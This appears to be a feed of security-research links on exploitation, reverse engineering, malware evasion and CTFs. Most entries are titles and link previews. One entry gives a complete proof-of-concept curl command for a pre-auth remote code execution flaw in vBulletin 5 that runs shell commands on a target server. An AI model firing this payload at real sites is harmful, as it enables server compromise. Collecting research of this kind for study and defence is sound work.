The core of Apple is PPL (Apple's Page Protection Layer): Breaking the XNU kernel's kernel https://googleprojectzero.blogspot.com/2020/07/the-core-of-apple-is-ppl-breaking-xnu.html #exploitation #macos #ios #dukeBarman
Blogspot
The core of Apple is PPL: Breaking the XNU kernel's kernel
Posted by Brandon Azad, Project Zero While doing research for the one-byte exploit technique , I considered several ways it might be poss...
WasmBoxC: Simple, Easy, and Fast VM-less Sandboxing https://kripken.github.io/blog/wasm/2020/07/27/wasmboxc.html #exploitation #dukeBarman
kripken.github.io
WasmBoxC: Simple, Easy, and Fast VM-less Sandboxing
The software ecosystem has a lot of useful but unsafe code, and the easier it is to sandbox that code, the more often that'll happen. If it were as simple as ...
A gentle introduction into ARM assembly https://www.shadowinfosec.io/2018/05/a-gentle-introduction-into-arm-assembly.html #reverse #dukeBarman
Reverse Engineering Starling Bank (Part I): Obfuscation Techniques https://hot3eed.github.io/2020/07/30/starling_p1_obfuscations.html
Reverse Engineering Starling Bank (Part II): Jailbreak & Debugger Detection, Weaknesses & Mitigations https://hot3eed.github.io/2020/08/02/starling_p2_detections_mitigations.html
#reverse #ios #frida
hot3eed.github.io
Reverse Engineering Starling Bank (Part I): Obfuscation Techniques
Reverse Engineering Starling Bank (Part I): Obfuscation Techniques 2020-07-30
Article: Removing Kernel Callbacks Using Signed Drivers
https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
Code: Enumerating and removing kernel callbacks using signed vulnerable drivers
https://github.com/br-sn/CheekyBlinder
#reverse #expdev #malware #darw1n
GitHub
GitHub - br-sn/CheekyBlinder: Enumerating and removing kernel callbacks using signed vulnerable drivers
Enumerating and removing kernel callbacks using signed vulnerable drivers - br-sn/CheekyBlinder
CVE-2020-9854: "Unauthd" (three) logic bugs ftw! https://objective-see.com/blog/blog_0x4D.html #macos #exploit #dukeBarman
objective-see.org
CVE-2020-9854: "Unauthd" (three) logic bugs ftw!
Reverse-engineering and analysis of SanDisk High Endurance microSDXC card https://ripitapart.com/2020/07/16/reverse-engineering-and-analysis-of-sandisk-high-endurance-microsdxc-card/ #reverse #hardware
Rip It Apart - Jason's electronics blog-thingy
Reverse-engineering and analysis of SanDisk High Endurance microSDXC card
As seen on Hackaday! TL;DR: The SanDisk High Endurance cards use SanDisk/Toshiba 3D TLC Flash. It took way, way more work than it should have to figure this out (thanks for nothing, SanDisk!...
Exploiting Android Messengers with WebRTC: Part 1 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-1.html #android #exploit #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 1
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in We...
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary https://github.com/sibears/IDAGolangHelper #ida #reverse #dukeBarman
GitHub
GitHub - sibears/IDAGolangHelper: Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary
Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary - sibears/IDAGolangHelper
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle https://googleprojectzero.blogspot.com/2020/08/mms-exploit-part-4-completing-aslr-oracle.html #exploit #android #dukeBarman
Blogspot
MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle
Posted by Mateusz Jurczyk, Project Zero This post is the fourth of a multi-part series capturing my journey from discovering a vulnerabl...
Why are Frida and QBDI a Great Blend on Android? https://blog.quarkslab.com/why-are-frida-and-qbdi-a-great-blend-on-android.html #android #frida #dukeBarman
Quarkslab
Why are Frida and QBDI a Great Blend on Android? - Quarkslab's blog
This blog post dives into how to get a better understanding of an Android native function by taking full advantage of both Frida and QBDI.
Announcing the Seventh Annual Flare-On Challenge https://www.fireeye.com/blog/threat-research/2020/08/announcing-the-seventh-annual-flare-on-challenge.html #reverse #CTF #dukeBarman
Google Cloud Blog
7th Annual Flare-On Challenge | Reverse Engineering Challenge | Google Cloud Blog
The Front Line Applied Research & Expertise (FLARE) team is honored to announce that the popular Flare-On challenge will return for a seventh year.
SVE-2019-15230: A bug collision https://allsoftwaresucks.blogspot.com/2020/08/sve-2019-15230-bug-collision.html #android #dukeBarman
Blogspot
SVE-2019-15230: A bug collision
Researchers from Team T5 recently published their write-up on exploiting a bug in S-Boot and obtaining code execution in the Samsung Secure ...
Exploiting Android Messengers with WebRTC: Part 2 https://googleprojectzero.blogspot.com/2020/08/exploiting-android-messengers-part-2.html #exploit #android #dukeBarman
Blogspot
Exploiting Android Messengers with WebRTC: Part 2
Posted by Natalie Silvanovich, Project Zero This is a three-part series on exploiting messenger applications using vulnerabilities in WebR...
Attack Secure Boot of SEP https://github.com/windknown/presentations/raw/master/Attack_Secure_Boot_of_SEP.pdf #exploitation #iOS #dukeBarman
Fuzzing the Windows API for AV Evasion
https://winternl.com/fuzzing-the-windows-api-for-av-evasion/
#reverse #malware #fuzzing #win #Thatskriptkid
winternl
Fuzzing the Windows API for AV Evasion
Malware Detection Systems (MDSs) use a technique called emulation as perhaps their most effective weapon against novel malware threats. Emulation does not rely on the static structure or signature of...
https://arstechnica.com/information-technology/2020/08/snapdragon-chip-flaws-put-1-billion-android-phones-at-risk-of-data-theft/ #Gyokuyou
Ars Technica
Snapdragon chip flaws put >1 billion Android phones at risk of data theft
There's no word on when Google and phone makers will incorporate fix from Qualcomm.
A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n
CTF for #r2con2020 is officially open: https://ctf.radare.org/welcome.html #reverse #CTF #dukeBarman
Introduction to Whiteboxes and Collision-Based Attacks With QBDI
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
Quarkslab
Introduction to Whiteboxes and Collision-Based Attacks With QBDI - Quarkslab's blog
This post is a noob-friendly introduction to whiteboxes along with the presentation and explanation of a (not-new) collision-based attack. The attack is demonstrated against a public whitebox, using QBDI to instrument and analyze the target in order to produce...